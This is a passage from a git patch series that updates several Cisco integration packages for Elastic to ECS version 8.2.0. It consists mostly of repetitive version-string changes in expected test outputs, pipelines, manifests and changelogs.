@@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402890747Z" @@ -878,7 +878,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402891635Z" @@ -890,7 +890,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402892676Z" @@ -902,7 +902,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402897820Z" @@ -914,7 +914,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402900543Z" @@ -926,7 +926,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402902009Z" @@ -938,7 +938,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402903304Z" @@ -950,7 +950,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402904182Z" @@ -962,7 +962,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402905133Z" @@ -974,7 +974,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402906346Z" @@ -986,7 +986,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402907198Z" @@ -998,7 +998,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402908149Z" @@ -1010,7 +1010,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402909011Z" @@ -1022,7 +1022,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402909867Z" @@ -1034,7 +1034,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402910758Z" @@ -1046,7 +1046,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402911649Z" @@ -1058,7 +1058,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402912501Z" @@ -1070,7 +1070,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402913354Z" @@ -1082,7 +1082,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402914214Z" @@ -1094,7 +1094,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402915077Z" @@ -1106,7 +1106,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402915952Z" @@ -1118,7 +1118,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402916820Z" @@ -1130,7 +1130,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402917680Z" @@ -1142,7 +1142,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402918551Z" @@ -1154,7 +1154,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402919417Z" @@ -1166,7 +1166,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402920282Z" @@ -1178,7 +1178,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402921147Z" @@ -1190,7 +1190,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402922010Z" diff --git a/packages/cisco_meraki/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_meraki/data_stream/log/elasticsearch/ingest_pipeline/default.yml index a932e4cc8eb..546c92efd60 100644 --- a/packages/cisco_meraki/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_meraki/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -8,7 +8,7 @@ processors: value: '{{_ingest.timestamp}}' - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' # User agent - user_agent: field: user_agent.original diff --git a/packages/cisco_meraki/data_stream/log/sample_event.json b/packages/cisco_meraki/data_stream/log/sample_event.json index d8c468fb765..e3cebb197bf 100644 --- a/packages/cisco_meraki/data_stream/log/sample_event.json +++ b/packages/cisco_meraki/data_stream/log/sample_event.json @@ -19,7 +19,7 @@ "port": 5293 }, "ecs": { - "version": "1.12.0" + "version": "8.2.0" }, "elastic_agent": { "id": "4e3f135a-d5f9-40b6-ae01-2c834ecbead0", diff --git a/packages/cisco_meraki/docs/README.md b/packages/cisco_meraki/docs/README.md index 17f05ec1da9..7a2a8ae3319 100644 --- a/packages/cisco_meraki/docs/README.md +++ b/packages/cisco_meraki/docs/README.md @@ -35,7 +35,7 @@ An example event for `log` looks as following: "port": 5293 }, "ecs": { - "version": "1.12.0" + "version": "8.2.0" }, "elastic_agent": { "id": "4e3f135a-d5f9-40b6-ae01-2c834ecbead0", diff --git a/packages/cisco_meraki/manifest.yml b/packages/cisco_meraki/manifest.yml index b97e69619e4..94b3cdd958d 100644 --- a/packages/cisco_meraki/manifest.yml +++ b/packages/cisco_meraki/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_meraki title: Cisco Meraki -version: 0.4.0 +version: 0.5.0 license: basic description: Collect logs from Cisco Meraki with Elastic Agent. type: integration From 81ee028493491699d661d491a68009c3259b7310 Mon Sep 17 00:00:00 2001 From: Taylor Swanson Date: Wed, 23 Feb 2022 11:55:21 -0600 Subject: [PATCH 15/23] Update cisco_nexus to ECS 8.2 --- packages/cisco_nexus/_dev/build/build.yml | 2 +- packages/cisco_nexus/changelog.yml | 5 +++++ .../log/_dev/test/pipeline/test-nexus.log-expected.json | 2 +- .../log/elasticsearch/ingest_pipeline/default.yml | 2 +- packages/cisco_nexus/data_stream/log/sample_event.json | 2 +- packages/cisco_nexus/docs/README.md | 2 +- packages/cisco_nexus/manifest.yml | 2 +- 7 files changed, 11 insertions(+), 6 deletions(-) diff --git a/packages/cisco_nexus/_dev/build/build.yml b/packages/cisco_nexus/_dev/build/build.yml index 809e76063e9..d61527283ec 100644 --- a/packages/cisco_nexus/_dev/build/build.yml +++ b/packages/cisco_nexus/_dev/build/build.yml @@ -1,3 +1,3 @@ dependencies: ecs: - reference: git@8.0 + reference: git@8.2 diff --git a/packages/cisco_nexus/changelog.yml b/packages/cisco_nexus/changelog.yml index e5d2ea814b2..c6ebd801fb9 100644 --- a/packages/cisco_nexus/changelog.yml +++ b/packages/cisco_nexus/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.5.0" + changes: + - description: Update to ECS 8.2.0 + type: enhancement + link: https://github.com/elastic/integrations/pull/xxxx - version: "0.4.0" changes: - description: Update to ECS 8.0.0 diff --git a/packages/cisco_nexus/data_stream/log/_dev/test/pipeline/test-nexus.log-expected.json b/packages/cisco_nexus/data_stream/log/_dev/test/pipeline/test-nexus.log-expected.json index 518f3618e94..5342e9a5e2b 100644 --- a/packages/cisco_nexus/data_stream/log/_dev/test/pipeline/test-nexus.log-expected.json +++ b/packages/cisco_nexus/data_stream/log/_dev/test/pipeline/test-nexus.log-expected.json @@ -2,7 +2,7 @@ "expected": [ { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:08:51.152643821Z" diff --git a/packages/cisco_nexus/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_nexus/data_stream/log/elasticsearch/ingest_pipeline/default.yml index a9946fcdb8c..d916e519ac8 100644 --- a/packages/cisco_nexus/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_nexus/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -8,7 +8,7 @@ processors: value: '{{_ingest.timestamp}}' - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' # User agent - user_agent: field: user_agent.original diff --git a/packages/cisco_nexus/data_stream/log/sample_event.json b/packages/cisco_nexus/data_stream/log/sample_event.json index 4311c64b9d1..ea998bdb318 100644 --- a/packages/cisco_nexus/data_stream/log/sample_event.json +++ b/packages/cisco_nexus/data_stream/log/sample_event.json @@ -13,7 +13,7 @@ "type": "logs" }, "ecs": { - "version": "1.12.0" + "version": "8.2.0" }, "elastic_agent": { "id": "4e3f135a-d5f9-40b6-ae01-2c834ecbead0", diff --git a/packages/cisco_nexus/docs/README.md b/packages/cisco_nexus/docs/README.md index 6abaa7a2c52..044aa241b54 100644 --- a/packages/cisco_nexus/docs/README.md +++ b/packages/cisco_nexus/docs/README.md @@ -29,7 +29,7 @@ An example event for `log` looks as following: "type": "logs" }, "ecs": { - "version": "1.12.0" + "version": "8.2.0" }, "elastic_agent": { "id": "4e3f135a-d5f9-40b6-ae01-2c834ecbead0", diff --git a/packages/cisco_nexus/manifest.yml b/packages/cisco_nexus/manifest.yml index e0a643622b1..7979c857a8c 100644 --- a/packages/cisco_nexus/manifest.yml +++ b/packages/cisco_nexus/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_nexus title: Cisco Nexus -version: 0.4.0 +version: 0.5.0 license: basic description: Collect logs from Cisco Nexus with Elastic Agent. type: integration From 9821c1ad97df5e38bdd098748132028491245e6a Mon Sep 17 00:00:00 2001 From: Taylor Swanson Date: Wed, 23 Feb 2022 12:08:07 -0600 Subject: [PATCH 16/23] Update cisco_secure_endpoint to ECS 8.2 --- .../_dev/build/build.yml | 2 +- packages/cisco_secure_endpoint/changelog.yml | 5 + .../test-cisco-amp1.log-expected.json | 98 ++++----- .../test-cisco-amp2.log-expected.json | 84 ++++---- .../test-cisco-amp3.log-expected.json | 90 ++++---- .../test-cisco-amp4.log-expected.json | 200 +++++++++--------- .../test-cisco-amp5.log-expected.json | 124 +++++------ .../test-cisco-amp6.log-expected.json | 106 +++++----- .../test-cisco-amp7.log-expected.json | 98 ++++----- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../data_stream/event/sample_event.json | 2 +- packages/cisco_secure_endpoint/docs/README.md | 2 +- packages/cisco_secure_endpoint/manifest.yml | 2 +- 13 files changed, 410 insertions(+), 405 deletions(-) diff --git a/packages/cisco_secure_endpoint/_dev/build/build.yml b/packages/cisco_secure_endpoint/_dev/build/build.yml index 809e76063e9..d61527283ec 100644 --- a/packages/cisco_secure_endpoint/_dev/build/build.yml +++ b/packages/cisco_secure_endpoint/_dev/build/build.yml @@ -1,3 +1,3 @@ dependencies: ecs: - reference: git@8.0 + reference: git@8.2 diff --git a/packages/cisco_secure_endpoint/changelog.yml b/packages/cisco_secure_endpoint/changelog.yml index dda6119c816..10bad37dfed 100644 --- a/packages/cisco_secure_endpoint/changelog.yml +++ b/packages/cisco_secure_endpoint/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.1.0" + changes: + - description: Update to ECS 8.2 + type: enhancement + link: https://github.com/elastic/integrations/pull/xxxx - version: "2.0.0" changes: - description: Update to ECS 8.0 diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json index d2a20938e64..96c4828064a 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json @@ -34,7 +34,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -112,7 +112,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Policy Update", @@ -178,7 +178,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -276,7 +276,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -352,7 +352,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -429,7 +429,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -532,7 +532,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -626,7 +626,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -705,7 +705,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -792,7 +792,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -879,7 +879,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -966,7 +966,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -1053,7 +1053,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -1140,7 +1140,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -1225,7 +1225,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1298,7 +1298,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1371,7 +1371,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1444,7 +1444,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1517,7 +1517,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1591,7 +1591,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1691,7 +1691,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -1770,7 +1770,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "File Fetch Completed", @@ -1860,7 +1860,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -1939,7 +1939,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected in Low Prevalence Executable", @@ -2012,7 +2012,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "File Fetch Completed", @@ -2090,7 +2090,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Policy Update", @@ -2155,7 +2155,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -2227,7 +2227,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine", @@ -2300,7 +2300,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -2380,7 +2380,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -2562,7 +2562,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Vulnerable Application Detected", @@ -2636,7 +2636,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Policy Update", @@ -2704,7 +2704,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -2791,7 +2791,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -2871,7 +2871,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -2950,7 +2950,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -3025,7 +3025,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Policy Update", @@ -3091,7 +3091,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3189,7 +3189,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -3266,7 +3266,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3364,7 +3364,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -3443,7 +3443,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -3530,7 +3530,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -3631,7 +3631,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Vulnerable Application Detected", @@ -3731,7 +3731,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Vulnerable Application Detected", @@ -3861,7 +3861,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Vulnerable Application Detected", @@ -3935,7 +3935,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Policy Update", @@ -3999,7 +3999,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Scan Completed, No Detections", @@ -4058,7 +4058,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Scan Started", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json index f19aa8cf84d..95133cef5be 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json @@ -81,7 +81,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "SecureX Threat Hunting Incident", @@ -176,7 +176,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -279,7 +279,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -378,7 +378,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -483,7 +483,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "DFC Threat Detected", @@ -591,7 +591,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "DFC Threat Detected", @@ -699,7 +699,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "DFC Threat Detected", @@ -807,7 +807,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "DFC Threat Detected", @@ -915,7 +915,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "DFC Threat Detected", @@ -1023,7 +1023,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "DFC Threat Detected", @@ -1116,7 +1116,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -1197,7 +1197,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1290,7 +1290,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Multiple Infected Files", @@ -1369,7 +1369,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1459,7 +1459,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1545,7 +1545,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1634,7 +1634,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Executed malware", @@ -1716,7 +1716,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1806,7 +1806,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1892,7 +1892,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1978,7 +1978,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2068,7 +2068,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2158,7 +2158,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2244,7 +2244,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2344,7 +2344,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Vulnerable Application Detected", @@ -2424,7 +2424,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2514,7 +2514,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2600,7 +2600,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2686,7 +2686,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2776,7 +2776,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2862,7 +2862,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2948,7 +2948,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3028,7 +3028,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3108,7 +3108,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3192,7 +3192,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3291,7 +3291,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3381,7 +3381,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3467,7 +3467,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3553,7 +3553,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3636,7 +3636,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Executed malware", @@ -3715,7 +3715,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3795,7 +3795,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json index 85789c49765..eed930aea2e 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json @@ -34,7 +34,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -114,7 +114,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -198,7 +198,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -282,7 +282,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -366,7 +366,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -450,7 +450,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -534,7 +534,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -618,7 +618,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -702,7 +702,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -786,7 +786,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -870,7 +870,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -954,7 +954,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1038,7 +1038,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1122,7 +1122,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1206,7 +1206,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1290,7 +1290,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1374,7 +1374,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1458,7 +1458,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1538,7 +1538,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1622,7 +1622,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1706,7 +1706,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1794,7 +1794,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1893,7 +1893,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1981,7 +1981,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2080,7 +2080,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2168,7 +2168,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2267,7 +2267,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2351,7 +2351,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2450,7 +2450,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2530,7 +2530,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2610,7 +2610,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2700,7 +2700,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2786,7 +2786,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2876,7 +2876,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2966,7 